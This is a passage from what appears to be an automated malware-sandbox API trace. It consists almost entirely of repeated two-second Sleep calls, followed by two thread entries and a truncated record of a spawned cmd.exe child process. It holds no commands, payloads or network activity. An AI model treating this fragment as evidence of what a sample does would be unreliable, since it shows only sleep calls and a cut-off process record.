(dwMilliseconds=0x7d0) [0180.543] Sleep (dwMilliseconds=0x7d0) [0180.560] Sleep (dwMilliseconds=0x7d0) [0180.580] Sleep (dwMilliseconds=0x7d0) [0180.598] Sleep (dwMilliseconds=0x7d0) [0180.622] Sleep (dwMilliseconds=0x7d0) [0180.638] Sleep (dwMilliseconds=0x7d0) [0180.652] Sleep (dwMilliseconds=0x7d0) [0180.668] Sleep (dwMilliseconds=0x7d0) [0180.685] Sleep (dwMilliseconds=0x7d0) [0180.700] Sleep (dwMilliseconds=0x7d0) [0180.715] Sleep (dwMilliseconds=0x7d0) [0180.730] Sleep (dwMilliseconds=0x7d0) [0180.747] Sleep (dwMilliseconds=0x7d0) [0180.762] Sleep (dwMilliseconds=0x7d0) [0180.777] Sleep (dwMilliseconds=0x7d0) [0180.794] Sleep (dwMilliseconds=0x7d0) [0180.809] Sleep (dwMilliseconds=0x7d0) [0180.824] Sleep (dwMilliseconds=0x7d0) [0180.842] Sleep (dwMilliseconds=0x7d0) [0180.855] Sleep (dwMilliseconds=0x7d0) [0180.870] Sleep (dwMilliseconds=0x7d0) [0180.887] Sleep (dwMilliseconds=0x7d0) [0180.903] Sleep (dwMilliseconds=0x7d0) [0180.918] Sleep (dwMilliseconds=0x7d0) [0180.933] Sleep (dwMilliseconds=0x7d0) [0180.949] Sleep (dwMilliseconds=0x7d0) [0180.967] Sleep (dwMilliseconds=0x7d0) [0180.982] Sleep (dwMilliseconds=0x7d0) [0180.997] Sleep (dwMilliseconds=0x7d0) [0181.014] Sleep (dwMilliseconds=0x7d0) [0181.028] Sleep (dwMilliseconds=0x7d0) [0181.043] Sleep (dwMilliseconds=0x7d0) [0181.060] Sleep (dwMilliseconds=0x7d0) [0181.075] Sleep (dwMilliseconds=0x7d0) [0181.094] Sleep (dwMilliseconds=0x7d0) [0181.122] Sleep (dwMilliseconds=0x7d0) [0181.136] Sleep (dwMilliseconds=0x7d0) [0181.152] Sleep (dwMilliseconds=0x7d0) [0181.170] Sleep (dwMilliseconds=0x7d0) [0181.184] Sleep (dwMilliseconds=0x7d0) [0181.199] Sleep (dwMilliseconds=0x7d0) [0181.230] Sleep (dwMilliseconds=0x7d0) [0181.247] Sleep (dwMilliseconds=0x7d0) [0181.261] Sleep (dwMilliseconds=0x7d0) [0181.281] Sleep (dwMilliseconds=0x7d0) [0181.292] Sleep (dwMilliseconds=0x7d0) [0181.308] Sleep (dwMilliseconds=0x7d0) [0181.325] Sleep (dwMilliseconds=0x7d0) [0181.339] Sleep (dwMilliseconds=0x7d0) [0181.355] Sleep (dwMilliseconds=0x7d0) [0181.371] Sleep (dwMilliseconds=0x7d0) [0181.386] Sleep (dwMilliseconds=0x7d0) [0181.402] Sleep (dwMilliseconds=0x7d0) [0181.417] Sleep (dwMilliseconds=0x7d0) [0181.436] Sleep (dwMilliseconds=0x7d0) [0181.450] Sleep (dwMilliseconds=0x7d0) [0181.464] Sleep (dwMilliseconds=0x7d0) [0181.480] Sleep (dwMilliseconds=0x7d0) [0181.495] Sleep (dwMilliseconds=0x7d0) [0181.511] Sleep (dwMilliseconds=0x7d0) [0181.526] Sleep (dwMilliseconds=0x7d0) [0181.542] Sleep (dwMilliseconds=0x7d0) [0181.557] Sleep (dwMilliseconds=0x7d0) [0181.574] Sleep (dwMilliseconds=0x7d0) [0181.590] Sleep (dwMilliseconds=0x7d0) [0181.612] Sleep (dwMilliseconds=0x7d0) [0181.620] Sleep (dwMilliseconds=0x7d0) [0181.638] Sleep (dwMilliseconds=0x7d0) [0181.650] Sleep (dwMilliseconds=0x7d0) [0181.669] Sleep (dwMilliseconds=0x7d0) [0181.685] Sleep (dwMilliseconds=0x7d0) [0181.697] Sleep (dwMilliseconds=0x7d0) [0181.713] Sleep (dwMilliseconds=0x7d0) [0181.729] Sleep (dwMilliseconds=0x7d0) [0181.745] Sleep (dwMilliseconds=0x7d0) [0181.760] Sleep (dwMilliseconds=0x7d0) [0181.776] Sleep (dwMilliseconds=0x7d0) [0181.791] Sleep (dwMilliseconds=0x7d0) [0181.807] Sleep (dwMilliseconds=0x7d0) [0181.822] Sleep (dwMilliseconds=0x7d0) [0181.838] Sleep (dwMilliseconds=0x7d0) [0181.856] Sleep (dwMilliseconds=0x7d0) [0181.872] Sleep (dwMilliseconds=0x7d0) [0181.885] Sleep (dwMilliseconds=0x7d0) [0181.901] Sleep (dwMilliseconds=0x7d0) [0181.916] Sleep (dwMilliseconds=0x7d0) [0181.932] Sleep (dwMilliseconds=0x7d0) [0181.947] Sleep (dwMilliseconds=0x7d0) [0181.964] Sleep (dwMilliseconds=0x7d0) [0181.978] Sleep (dwMilliseconds=0x7d0) [0181.995] Sleep (dwMilliseconds=0x7d0) [0182.010] Sleep (dwMilliseconds=0x7d0) [0182.025] Sleep (dwMilliseconds=0x7d0) [0182.041] Sleep (dwMilliseconds=0x7d0) [0182.057] Sleep (dwMilliseconds=0x7d0) [0182.073] Sleep (dwMilliseconds=0x7d0) [0182.089] Sleep (dwMilliseconds=0x7d0) [0182.104] Sleep (dwMilliseconds=0x7d0) [0182.123] Sleep (dwMilliseconds=0x7d0) [0182.175] Sleep (dwMilliseconds=0x7d0) [0182.180] Sleep (dwMilliseconds=0x7d0) [0182.196] Sleep (dwMilliseconds=0x7d0) [0182.225] Sleep (dwMilliseconds=0x7d0) [0182.246] Sleep (dwMilliseconds=0x7d0) [0182.259] Sleep (dwMilliseconds=0x7d0) [0182.276] Sleep (dwMilliseconds=0x7d0) [0182.291] Sleep (dwMilliseconds=0x7d0) [0182.307] Sleep (dwMilliseconds=0x7d0) [0182.321] Sleep (dwMilliseconds=0x7d0) [0182.340] Sleep (dwMilliseconds=0x7d0) [0182.355] Sleep (dwMilliseconds=0x7d0) [0182.368] Sleep (dwMilliseconds=0x7d0) [0182.386] Sleep (dwMilliseconds=0x7d0) [0182.399] Sleep (dwMilliseconds=0x7d0) [0182.416] Sleep (dwMilliseconds=0x7d0) [0182.431] Sleep (dwMilliseconds=0x7d0) [0182.447] Sleep (dwMilliseconds=0x7d0) [0182.463] Sleep (dwMilliseconds=0x7d0) [0182.477] Sleep (dwMilliseconds=0x7d0) [0182.495] Sleep (dwMilliseconds=0x7d0) [0182.509] Sleep (dwMilliseconds=0x7d0) [0182.525] Sleep (dwMilliseconds=0x7d0) [0182.550] Sleep (dwMilliseconds=0x7d0) [0182.555] Sleep (dwMilliseconds=0x7d0) [0182.572] Sleep (dwMilliseconds=0x7d0) [0182.587] Sleep (dwMilliseconds=0x7d0) [0182.606] Sleep (dwMilliseconds=0x7d0) [0182.622] Sleep (dwMilliseconds=0x7d0) [0182.638] Sleep (dwMilliseconds=0x7d0) [0182.649] Sleep (dwMilliseconds=0x7d0) [0182.666] Sleep (dwMilliseconds=0x7d0) [0182.681] Sleep (dwMilliseconds=0x7d0) [0182.696] Sleep (dwMilliseconds=0x7d0) [0182.713] Sleep (dwMilliseconds=0x7d0) [0182.727] Sleep (dwMilliseconds=0x7d0) [0182.745] Sleep (dwMilliseconds=0x7d0) [0182.758] Sleep (dwMilliseconds=0x7d0) [0182.774] Sleep (dwMilliseconds=0x7d0) [0182.797] Sleep (dwMilliseconds=0x7d0) [0182.807] Sleep (dwMilliseconds=0x7d0) [0182.821] Sleep (dwMilliseconds=0x7d0) [0182.837] Sleep (dwMilliseconds=0x7d0) [0182.852] Sleep (dwMilliseconds=0x7d0) [0182.870] Sleep (dwMilliseconds=0x7d0) [0182.884] Sleep (dwMilliseconds=0x7d0) [0182.902] Sleep (dwMilliseconds=0x7d0) [0182.915] Sleep (dwMilliseconds=0x7d0) [0182.932] Sleep (dwMilliseconds=0x7d0) [0182.946] Sleep (dwMilliseconds=0x7d0) [0182.961] Sleep (dwMilliseconds=0x7d0) [0182.977] Sleep (dwMilliseconds=0x7d0) [0182.994] Sleep (dwMilliseconds=0x7d0) [0183.011] Sleep (dwMilliseconds=0x7d0) [0183.024] Sleep (dwMilliseconds=0x7d0) [0183.039] Sleep (dwMilliseconds=0x7d0) [0183.055] Sleep (dwMilliseconds=0x7d0) [0183.071] Sleep (dwMilliseconds=0x7d0) [0183.086] Sleep (dwMilliseconds=0x7d0) [0183.102] Sleep (dwMilliseconds=0x7d0) [0183.118] Sleep (dwMilliseconds=0x7d0) [0183.134] Sleep (dwMilliseconds=0x7d0) [0183.150] Sleep (dwMilliseconds=0x7d0) [0183.164] Sleep (dwMilliseconds=0x7d0) [0183.182] Sleep (dwMilliseconds=0x7d0) [0183.196] Sleep (dwMilliseconds=0x7d0) [0183.220] Sleep (dwMilliseconds=0x7d0) [0183.226] Sleep (dwMilliseconds=0x7d0) [0183.242] Sleep (dwMilliseconds=0x7d0) [0183.261] Sleep (dwMilliseconds=0x7d0) [0183.273] Sleep (dwMilliseconds=0x7d0) [0183.291] Sleep (dwMilliseconds=0x7d0) [0183.305] Sleep (dwMilliseconds=0x7d0) [0183.323] Sleep (dwMilliseconds=0x7d0) [0183.336] Sleep (dwMilliseconds=0x7d0) [0183.352] Sleep (dwMilliseconds=0x7d0) [0183.367] Sleep (dwMilliseconds=0x7d0) [0183.386] Sleep (dwMilliseconds=0x7d0) [0183.398] Sleep (dwMilliseconds=0x7d0) [0183.414] Sleep (dwMilliseconds=0x7d0) [0183.430] Sleep (dwMilliseconds=0x7d0) [0183.458] Sleep (dwMilliseconds=0x7d0) [0183.478] Sleep (dwMilliseconds=0x7d0) [0183.491] Sleep (dwMilliseconds=0x7d0) [0183.511] Sleep (dwMilliseconds=0x7d0) [0183.522] Sleep (dwMilliseconds=0x7d0) [0183.540] Sleep (dwMilliseconds=0x7d0) [0183.555] Sleep (dwMilliseconds=0x7d0) [0183.570] Sleep (dwMilliseconds=0x7d0) [0183.587] Sleep (dwMilliseconds=0x7d0) [0183.604] Sleep (dwMilliseconds=0x7d0) [0183.617] Sleep (dwMilliseconds=0x7d0) [0183.636] Sleep (dwMilliseconds=0x7d0) [0183.647] Sleep (dwMilliseconds=0x7d0) [0183.663] Sleep (dwMilliseconds=0x7d0) [0183.679] Sleep (dwMilliseconds=0x7d0) [0183.696] Sleep (dwMilliseconds=0x7d0) [0183.710] Sleep (dwMilliseconds=0x7d0) [0183.727] Sleep (dwMilliseconds=0x7d0) [0183.743] Sleep (dwMilliseconds=0x7d0) [0183.757] Sleep (dwMilliseconds=0x7d0) [0183.773] Sleep (dwMilliseconds=0x7d0) [0183.789] Sleep (dwMilliseconds=0x7d0) [0183.804] Sleep (dwMilliseconds=0x7d0) [0183.820] Sleep (dwMilliseconds=0x7d0) [0183.834] Sleep (dwMilliseconds=0x7d0) [0183.850] Sleep (dwMilliseconds=0x7d0) [0183.867] Sleep (dwMilliseconds=0x7d0) [0183.884] Sleep (dwMilliseconds=0x7d0) [0183.898] Sleep (dwMilliseconds=0x7d0) [0183.913] Sleep (dwMilliseconds=0x7d0) [0183.929] Sleep (dwMilliseconds=0x7d0) [0183.945] Sleep (dwMilliseconds=0x7d0) [0183.962] Sleep (dwMilliseconds=0x7d0) [0183.975] Sleep (dwMilliseconds=0x7d0) [0183.992] Sleep (dwMilliseconds=0x7d0) [0184.007] Sleep (dwMilliseconds=0x7d0) [0184.024] Sleep (dwMilliseconds=0x7d0) [0184.039] Sleep (dwMilliseconds=0x7d0) [0184.054] Sleep (dwMilliseconds=0x7d0) [0184.069] Sleep (dwMilliseconds=0x7d0) [0184.085] Sleep (dwMilliseconds=0x7d0) [0184.100] Sleep (dwMilliseconds=0x7d0) [0184.116] Sleep (dwMilliseconds=0x7d0) [0184.132] Sleep (dwMilliseconds=0x7d0) [0184.147] Sleep (dwMilliseconds=0x7d0) [0184.165] Sleep (dwMilliseconds=0x7d0) [0184.178] Sleep (dwMilliseconds=0x7d0) [0184.194] Sleep (dwMilliseconds=0x7d0) [0184.221] Sleep (dwMilliseconds=0x7d0) [0184.243] Sleep (dwMilliseconds=0x7d0) [0184.259] Sleep (dwMilliseconds=0x7d0) [0184.275] Sleep (dwMilliseconds=0x7d0) [0184.288] Sleep (dwMilliseconds=0x7d0) [0184.304] Sleep (dwMilliseconds=0x7d0) [0184.320] Sleep (dwMilliseconds=0x7d0) [0184.335] Sleep (dwMilliseconds=0x7d0) [0184.350] Sleep (dwMilliseconds=0x7d0) [0184.366] Sleep (dwMilliseconds=0x7d0) [0184.381] Sleep (dwMilliseconds=0x7d0) [0184.397] Sleep (dwMilliseconds=0x7d0) [0184.412] Sleep (dwMilliseconds=0x7d0) [0184.428] Sleep (dwMilliseconds=0x7d0) [0184.444] Sleep (dwMilliseconds=0x7d0) [0184.458] Sleep (dwMilliseconds=0x7d0) [0184.475] Sleep (dwMilliseconds=0x7d0) [0184.491] Sleep (dwMilliseconds=0x7d0) [0184.506] Sleep (dwMilliseconds=0x7d0) [0184.521] Sleep (dwMilliseconds=0x7d0) [0184.537] Sleep (dwMilliseconds=0x7d0) [0184.566] Sleep (dwMilliseconds=0x7d0) [0184.584] Sleep (dwMilliseconds=0x7d0) [0184.600] Sleep (dwMilliseconds=0x7d0) [0184.618] Sleep (dwMilliseconds=0x7d0) [0184.633] Sleep (dwMilliseconds=0x7d0) [0184.646] Sleep (dwMilliseconds=0x7d0) [0184.663] Sleep (dwMilliseconds=0x7d0) [0184.677] Sleep (dwMilliseconds=0x7d0) [0184.694] Sleep (dwMilliseconds=0x7d0) [0184.709] Sleep (dwMilliseconds=0x7d0) [0184.725] Sleep (dwMilliseconds=0x7d0) [0184.747] Sleep (dwMilliseconds=0x7d0) [0184.755] Sleep (dwMilliseconds=0x7d0) [0184.773] Sleep (dwMilliseconds=0x7d0) [0184.787] Sleep (dwMilliseconds=0x7d0) [0184.802] Sleep (dwMilliseconds=0x7d0) [0184.818] Sleep (dwMilliseconds=0x7d0) [0184.834] Sleep (dwMilliseconds=0x7d0) [0184.849] Sleep (dwMilliseconds=0x7d0) [0184.864] Sleep (dwMilliseconds=0x7d0) [0184.881] Sleep (dwMilliseconds=0x7d0) [0184.898] Sleep (dwMilliseconds=0x7d0) [0184.913] Sleep (dwMilliseconds=0x7d0) [0184.927] Sleep (dwMilliseconds=0x7d0) [0184.943] Sleep (dwMilliseconds=0x7d0) [0184.960] Sleep (dwMilliseconds=0x7d0) [0184.973] Sleep (dwMilliseconds=0x7d0) [0184.992] Sleep (dwMilliseconds=0x7d0) [0185.009] Sleep (dwMilliseconds=0x7d0) [0185.022] Sleep (dwMilliseconds=0x7d0) [0185.036] Sleep (dwMilliseconds=0x7d0) [0185.055] Sleep (dwMilliseconds=0x7d0) [0185.067] Sleep (dwMilliseconds=0x7d0) [0185.084] Sleep (dwMilliseconds=0x7d0) [0185.099] Sleep (dwMilliseconds=0x7d0) [0185.115] Sleep (dwMilliseconds=0x7d0) [0185.130] Sleep (dwMilliseconds=0x7d0) [0185.149] Sleep (dwMilliseconds=0x7d0) [0185.162] Sleep (dwMilliseconds=0x7d0) [0185.177] Sleep (dwMilliseconds=0x7d0) [0185.197] Sleep (dwMilliseconds=0x7d0) [0185.218] Sleep (dwMilliseconds=0x7d0) [0185.223] Sleep (dwMilliseconds=0x7d0) [0185.240] Sleep (dwMilliseconds=0x7d0) [0185.255] Sleep (dwMilliseconds=0x7d0) [0185.271] Sleep (dwMilliseconds=0x7d0) [0185.288] Sleep (dwMilliseconds=0x7d0) [0185.301] Sleep (dwMilliseconds=0x7d0) [0185.317] Sleep (dwMilliseconds=0x7d0) [0185.332] Sleep (dwMilliseconds=0x7d0) [0185.349] Sleep (dwMilliseconds=0x7d0) [0185.400] Sleep (dwMilliseconds=0x7d0) [0185.409] Sleep (dwMilliseconds=0x7d0) [0185.425] Sleep (dwMilliseconds=0x7d0) [0185.441] Sleep (dwMilliseconds=0x7d0) [0185.457] Sleep (dwMilliseconds=0x7d0) [0185.476] Sleep (dwMilliseconds=0x7d0) [0185.488] Sleep (dwMilliseconds=0x7d0) [0185.505] Sleep (dwMilliseconds=0x7d0) [0185.519] Sleep (dwMilliseconds=0x7d0) [0185.535] Sleep (dwMilliseconds=0x7d0) [0185.551] Sleep (dwMilliseconds=0x7d0) [0185.566] Sleep (dwMilliseconds=0x7d0) [0185.583] Sleep (dwMilliseconds=0x7d0) [0185.598] Sleep (dwMilliseconds=0x7d0) [0185.615] Sleep (dwMilliseconds=0x7d0) [0185.628] Sleep (dwMilliseconds=0x7d0) [0185.652] Sleep (dwMilliseconds=0x7d0) [0185.660] Sleep (dwMilliseconds=0x7d0) [0185.675] Sleep (dwMilliseconds=0x7d0) [0185.691] Sleep (dwMilliseconds=0x7d0) [0185.707] Sleep (dwMilliseconds=0x7d0) [0185.723] Sleep (dwMilliseconds=0x7d0) [0185.740] Sleep (dwMilliseconds=0x7d0) [0185.753] Sleep (dwMilliseconds=0x7d0) [0185.770] Sleep (dwMilliseconds=0x7d0) [0185.787] Sleep (dwMilliseconds=0x7d0) [0185.800] Sleep (dwMilliseconds=0x7d0) [0185.817] Sleep (dwMilliseconds=0x7d0) [0185.832] Sleep (dwMilliseconds=0x7d0) [0185.849] Sleep (dwMilliseconds=0x7d0) [0185.863] Sleep (dwMilliseconds=0x7d0) [0185.878] Sleep (dwMilliseconds=0x7d0) [0185.894] Sleep (dwMilliseconds=0x7d0) [0185.911] Sleep (dwMilliseconds=0x7d0) [0185.925] Sleep (dwMilliseconds=0x7d0) [0185.942] Sleep (dwMilliseconds=0x7d0) [0185.957] Sleep (dwMilliseconds=0x7d0) [0185.972] Sleep (dwMilliseconds=0x7d0) [0185.989] Sleep (dwMilliseconds=0x7d0) [0186.003] Sleep (dwMilliseconds=0x7d0) [0186.020] Sleep (dwMilliseconds=0x7d0) [0186.034] Sleep (dwMilliseconds=0x7d0) [0186.050] Sleep (dwMilliseconds=0x7d0) [0186.066] Sleep (dwMilliseconds=0x7d0) [0186.082] Sleep (dwMilliseconds=0x7d0) [0186.097] Sleep (dwMilliseconds=0x7d0) [0186.115] Sleep (dwMilliseconds=0x7d0) [0186.128] Sleep (dwMilliseconds=0x7d0) [0186.144] Sleep (dwMilliseconds=0x7d0) [0186.162] Sleep (dwMilliseconds=0x7d0) [0186.174] Sleep (dwMilliseconds=0x7d0) [0186.192] Sleep (dwMilliseconds=0x7d0) [0186.217] Sleep (dwMilliseconds=0x7d0) [0186.233] Sleep (dwMilliseconds=0x7d0) [0186.249] Sleep (dwMilliseconds=0x7d0) [0186.266] Sleep (dwMilliseconds=0x7d0) [0186.280] Sleep (dwMilliseconds=0x7d0) [0186.299] Sleep (dwMilliseconds=0x7d0) [0186.311] Sleep (dwMilliseconds=0x7d0) [0186.327] Sleep (dwMilliseconds=0x7d0) [0186.342] Sleep (dwMilliseconds=0x7d0) [0186.358] Sleep (dwMilliseconds=0x7d0) [0186.377] Sleep (dwMilliseconds=0x7d0) [0186.389] Sleep (dwMilliseconds=0x7d0) [0186.405] Sleep (dwMilliseconds=0x7d0) [0186.420] Sleep (dwMilliseconds=0x7d0) [0186.436] Sleep (dwMilliseconds=0x7d0) [0186.452] Sleep (dwMilliseconds=0x7d0) [0186.467] Sleep (dwMilliseconds=0x7d0) [0186.484] Sleep (dwMilliseconds=0x7d0) [0186.498] Sleep (dwMilliseconds=0x7d0) [0186.514] Sleep (dwMilliseconds=0x7d0) [0186.529] Sleep (dwMilliseconds=0x7d0) [0186.545] Sleep (dwMilliseconds=0x7d0) [0186.564] Sleep (dwMilliseconds=0x7d0) [0186.576] Sleep (dwMilliseconds=0x7d0) [0186.593] Sleep (dwMilliseconds=0x7d0) [0186.608] Sleep (dwMilliseconds=0x7d0) [0186.623] Sleep (dwMilliseconds=0x7d0) [0186.639] Sleep (dwMilliseconds=0x7d0) [0186.654] Sleep (dwMilliseconds=0x7d0) [0186.672] Sleep (dwMilliseconds=0x7d0) [0186.685] Sleep (dwMilliseconds=0x7d0) [0186.702] Sleep (dwMilliseconds=0x7d0) [0186.717] Sleep (dwMilliseconds=0x7d0) [0186.732] Sleep (dwMilliseconds=0x7d0) [0186.756] Sleep (dwMilliseconds=0x7d0) [0186.763] Sleep (dwMilliseconds=0x7d0) [0186.779] Sleep (dwMilliseconds=0x7d0) [0186.796] Sleep (dwMilliseconds=0x7d0) [0186.812] Sleep (dwMilliseconds=0x7d0) [0186.826] Sleep (dwMilliseconds=0x7d0) [0186.841] Sleep (dwMilliseconds=0x7d0) [0186.857] Sleep (dwMilliseconds=0x7d0) [0186.873] Sleep (dwMilliseconds=0x7d0) [0186.888] Sleep (dwMilliseconds=0x7d0) [0186.904] Sleep (dwMilliseconds=0x7d0) [0186.923] Sleep (dwMilliseconds=0x7d0) [0186.935] Sleep (dwMilliseconds=0x7d0) [0186.951] Sleep (dwMilliseconds=0x7d0) [0186.966] Sleep (dwMilliseconds=0x7d0) [0186.982] Sleep (dwMilliseconds=0x7d0) [0186.998] Sleep (dwMilliseconds=0x7d0) [0187.021] Sleep (dwMilliseconds=0x7d0) [0187.029] Sleep (dwMilliseconds=0x7d0) [0187.044] Sleep (dwMilliseconds=0x7d0) [0187.060] Sleep (dwMilliseconds=0x7d0) [0187.076] Sleep (dwMilliseconds=0x7d0) [0187.091] Sleep (dwMilliseconds=0x7d0) [0187.107] Sleep (dwMilliseconds=0x7d0) [0187.124] Sleep (dwMilliseconds=0x7d0) [0187.138] Sleep (dwMilliseconds=0x7d0) [0187.155] Sleep (dwMilliseconds=0x7d0) [0187.169] Sleep (dwMilliseconds=0x7d0) [0187.185] Sleep (dwMilliseconds=0x7d0) [0187.224] Sleep (dwMilliseconds=0x7d0) [0187.232] Sleep (dwMilliseconds=0x7d0) [0187.247] Sleep (dwMilliseconds=0x7d0) [0187.263] Sleep (dwMilliseconds=0x7d0) [0187.279] Sleep (dwMilliseconds=0x7d0) [0187.294] Sleep (dwMilliseconds=0x7d0) [0187.313] Sleep (dwMilliseconds=0x7d0) [0187.328] Sleep (dwMilliseconds=0x7d0) [0187.341] Sleep (dwMilliseconds=0x7d0) [0187.356] Sleep (dwMilliseconds=0x7d0) [0187.372] Sleep (dwMilliseconds=0x7d0) [0187.388] Sleep (dwMilliseconds=0x7d0) [0187.403] Sleep (dwMilliseconds=0x7d0) [0187.419] Sleep (dwMilliseconds=0x7d0) [0187.435] Sleep (dwMilliseconds=0x7d0) [0187.450] Sleep (dwMilliseconds=0x7d0) [0187.466] Sleep (dwMilliseconds=0x7d0) [0187.481] Sleep (dwMilliseconds=0x7d0) [0187.497] Sleep (dwMilliseconds=0x7d0) [0187.512] Sleep (dwMilliseconds=0x7d0) [0187.528] Sleep (dwMilliseconds=0x7d0) [0187.544] Sleep (dwMilliseconds=0x7d0) [0187.572] Sleep (dwMilliseconds=0x7d0) [0187.577] Sleep (dwMilliseconds=0x7d0) [0187.595] Sleep (dwMilliseconds=0x7d0) [0187.611] Sleep (dwMilliseconds=0x7d0) [0187.626] Sleep (dwMilliseconds=0x7d0) [0187.641] Sleep (dwMilliseconds=0x7d0) [0187.665] Sleep (dwMilliseconds=0x7d0) [0187.673] Sleep (dwMilliseconds=0x7d0) [0187.688] Sleep (dwMilliseconds=0x7d0) [0187.705] Sleep (dwMilliseconds=0x7d0) [0187.720] Sleep (dwMilliseconds=0x7d0) [0187.738] Sleep (dwMilliseconds=0x7d0) [0187.751] Sleep (dwMilliseconds=0x7d0) [0187.767] Sleep (dwMilliseconds=0x7d0) [0187.782] Sleep (dwMilliseconds=0x7d0) [0187.799] Sleep (dwMilliseconds=0x7d0) [0187.813] Sleep (dwMilliseconds=0x7d0) [0187.830] Sleep (dwMilliseconds=0x7d0) [0187.845] Sleep (dwMilliseconds=0x7d0) [0187.859] Sleep (dwMilliseconds=0x7d0) [0187.881] Sleep (dwMilliseconds=0x7d0) [0187.891] Sleep (dwMilliseconds=0x7d0) [0187.907] Sleep (dwMilliseconds=0x7d0) [0187.922] Sleep (dwMilliseconds=0x7d0) [0187.939] Sleep (dwMilliseconds=0x7d0) [0187.953] Sleep (dwMilliseconds=0x7d0) [0187.970] Sleep (dwMilliseconds=0x7d0) [0187.986] Sleep (dwMilliseconds=0x7d0) [0188.001] Sleep (dwMilliseconds=0x7d0) [0188.016] Sleep (dwMilliseconds=0x7d0) [0188.031] Sleep (dwMilliseconds=0x7d0) [0188.047] Sleep (dwMilliseconds=0x7d0) [0188.063] Sleep (dwMilliseconds=0x7d0) [0188.079] Sleep (dwMilliseconds=0x7d0) [0188.095] Sleep (dwMilliseconds=0x7d0) [0188.116] Sleep (dwMilliseconds=0x7d0) [0188.128] Sleep (dwMilliseconds=0x7d0) [0188.141] Sleep (dwMilliseconds=0x7d0) [0188.156] Sleep (dwMilliseconds=0x7d0) [0188.172] Sleep (dwMilliseconds=0x7d0) [0188.188] Sleep (dwMilliseconds=0x7d0) [0188.207] Sleep (dwMilliseconds=0x7d0) [0188.236] Sleep (dwMilliseconds=0x7d0) [0188.252] Sleep (dwMilliseconds=0x7d0) [0188.265] Sleep (dwMilliseconds=0x7d0) [0188.281] Sleep (dwMilliseconds=0x7d0) [0188.297] Sleep (dwMilliseconds=0x7d0) [0188.315] Sleep (dwMilliseconds=0x7d0) [0188.329] Sleep (dwMilliseconds=0x7d0) [0188.344] Sleep (dwMilliseconds=0x7d0) [0188.364] Sleep (dwMilliseconds=0x7d0) [0188.374] Sleep (dwMilliseconds=0x7d0) [0188.392] Sleep (dwMilliseconds=0x7d0) [0188.406] Sleep (dwMilliseconds=0x7d0) [0188.425] Sleep (dwMilliseconds=0x7d0) [0188.436] Sleep (dwMilliseconds=0x7d0) [0188.482] Sleep (dwMilliseconds=0x7d0) [0188.500] Sleep (dwMilliseconds=0x7d0) [0188.515] Sleep (dwMilliseconds=0x7d0) [0188.532] Sleep (dwMilliseconds=0x7d0) [0188.545] Sleep (dwMilliseconds=0x7d0) [0188.561] Sleep (dwMilliseconds=0x7d0) [0188.577] Sleep (dwMilliseconds=0x7d0) [0188.593] Sleep (dwMilliseconds=0x7d0) [0188.609] Sleep (dwMilliseconds=0x7d0) [0188.624] Sleep (dwMilliseconds=0x7d0) [0188.641] Sleep (dwMilliseconds=0x7d0) [0188.661] Sleep (dwMilliseconds=0x7d0) [0188.671] Sleep (dwMilliseconds=0x7d0) [0188.687] Sleep (dwMilliseconds=0x7d0) [0188.703] Sleep (dwMilliseconds=0x7d0) [0188.718] Sleep (dwMilliseconds=0x7d0) [0188.734] Sleep (dwMilliseconds=0x7d0) [0188.749] Sleep (dwMilliseconds=0x7d0) [0188.764] Sleep (dwMilliseconds=0x7d0) [0188.780] Sleep (dwMilliseconds=0x7d0) [0188.795] Sleep (dwMilliseconds=0x7d0) [0188.812] Sleep (dwMilliseconds=0x7d0) [0188.827] Sleep (dwMilliseconds=0x7d0) [0188.843] Sleep (dwMilliseconds=0x7d0) [0188.860] Sleep (dwMilliseconds=0x7d0) [0188.874] Sleep (dwMilliseconds=0x7d0) [0188.891] Sleep (dwMilliseconds=0x7d0) [0188.905] Sleep (dwMilliseconds=0x7d0) [0188.921] Sleep (dwMilliseconds=0x7d0) [0188.936] Sleep (dwMilliseconds=0x7d0) [0188.953] Sleep (dwMilliseconds=0x7d0) [0188.968] Sleep (dwMilliseconds=0x7d0) [0188.983] Sleep (dwMilliseconds=0x7d0) [0188.999] Sleep (dwMilliseconds=0x7d0) [0189.021] Sleep (dwMilliseconds=0x7d0) [0189.029] Sleep (dwMilliseconds=0x7d0) [0189.045] Sleep (dwMilliseconds=0x7d0) [0189.062] Sleep (dwMilliseconds=0x7d0) [0189.077] Sleep (dwMilliseconds=0x7d0) [0189.093] Sleep (dwMilliseconds=0x7d0) [0189.108] Sleep (dwMilliseconds=0x7d0) [0189.124] Sleep (dwMilliseconds=0x7d0) [0189.140] Sleep (dwMilliseconds=0x7d0) [0189.154] Sleep (dwMilliseconds=0x7d0) [0189.170] Sleep (dwMilliseconds=0x7d0) [0189.187] Sleep (dwMilliseconds=0x7d0) [0189.202] Sleep (dwMilliseconds=0x7d0) [0189.233] Sleep (dwMilliseconds=0x7d0) [0189.538] Sleep (dwMilliseconds=0x7d0) [0189.635] Sleep (dwMilliseconds=0x7d0) [0189.653] Sleep (dwMilliseconds=0x7d0) [0189.673] Sleep (dwMilliseconds=0x7d0) [0189.690] Sleep (dwMilliseconds=0x7d0) [0189.705] Sleep (dwMilliseconds=0x7d0) [0189.716] Sleep (dwMilliseconds=0x7d0) [0189.734] Sleep (dwMilliseconds=0x7d0) [0189.747] Sleep (dwMilliseconds=0x7d0) [0189.858] Sleep (dwMilliseconds=0x7d0) [0189.904] Sleep (dwMilliseconds=0x7d0) [0189.937] Sleep (dwMilliseconds=0x7d0) [0189.958] Sleep (dwMilliseconds=0x7d0) [0189.966] Sleep (dwMilliseconds=0x7d0) [0189.981] Sleep (dwMilliseconds=0x7d0) [0190.075] Sleep (dwMilliseconds=0x7d0) [0190.611] Sleep (dwMilliseconds=0x7d0) [0190.666] Sleep (dwMilliseconds=0x7d0) [0191.041] Sleep (dwMilliseconds=0x7d0) [0191.108] Sleep (dwMilliseconds=0x7d0) [0191.122] Sleep (dwMilliseconds=0x7d0) [0191.136] Sleep (dwMilliseconds=0x7d0) [0191.152] Sleep (dwMilliseconds=0x7d0) [0191.168] Sleep (dwMilliseconds=0x7d0) [0191.183] Sleep (dwMilliseconds=0x7d0) [0191.200] Sleep (dwMilliseconds=0x7d0) [0191.214] Sleep (dwMilliseconds=0x7d0) [0191.230] Sleep (dwMilliseconds=0x7d0) [0191.244] Sleep (dwMilliseconds=0x7d0) Thread: id = 51 os_tid = 0xfec Thread: id = 52 os_tid = 0xff0 Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x397df000" os_pid = "0xfac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = 